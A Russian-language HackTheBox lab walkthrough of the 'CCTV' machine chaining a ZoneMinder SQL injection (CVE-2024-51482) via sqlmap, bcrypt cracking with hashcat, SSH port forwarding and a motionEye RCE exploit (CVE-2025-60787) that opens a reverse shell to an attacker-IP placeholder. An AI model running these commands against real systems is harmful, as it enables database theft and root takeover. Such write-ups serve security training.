
Прохождение HackTheBox CCTV с цепочкой эксплуатации CVE-2024-51482 (SQL-инъекция в ZoneMinder), взломом bcrypt-хэша и CVE-2025-60787 (RCE в motionEye) для получения root.
Платформа: HackTheBox | ОС: Linux
SQL-инъекция в ZoneMinder через CVE-2024-51482 извлекает bcrypt-хеш из базы данных. Взлом хеша с помощью hashcat даёт доступ по SSH. Внутренний экземпляр motionEye, доступный через перенаправление портов, уязвим к CVE-2025-60787 — это даёт root-оболочку.
nmap -sV -sC 10.129.53.160 -Pn
22/tcp open ssh OpenSSH 9.6p1 (Ubuntu)
80/tcp open http Apache 2.4.58 — SecureVision CCTV & Security Solutions
Добавил cctv.htb в /etc/hosts. На порту 80 размещалась установка ZoneMinder.
CVE-2024-51482 — это уязвимость SQL-инъекции в эндпоинте входа ZoneMinder. Параметр username не санитизируется, что позволяет извлечь базу данных.
sqlmap -u "http://cctv.htb/zm/index.php" \
--data="username=admin&password=admin&action=login" \
--dbms=mysql --dump --batch
Извлёк bcrypt-хеш пароля из таблицы users.
hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txt
Пароль взломан.
ssh <user>@10.129.53.160
Получен флаг пользователя. Проверил внутренние сервисы.
ss -tlnp
# 127.0.0.1:8765 — motionEye CCTV management panel
Перенаправил порт.
ssh -L 8765:127.0.0.1:8765 <user>@10.129.53.160
CVE-2025-60787 — это аутентифицированный RCE в motionEye. При наличии доступа к внутренней панели произвольные команды выполняются от имени root.
nc -lvnp 4444
python3 exploit_CVE-2025-60787.py --url http://127.0.0.1:8765 --lhost <ATTACKER_IP> --lport 4444
Получена root-оболочка. Root-флаг находится в /root/root.txt.
Только в образовательных целях. Тестируйте только те системы, которыми владеете или на тестирование которых у вас есть явное разрешение.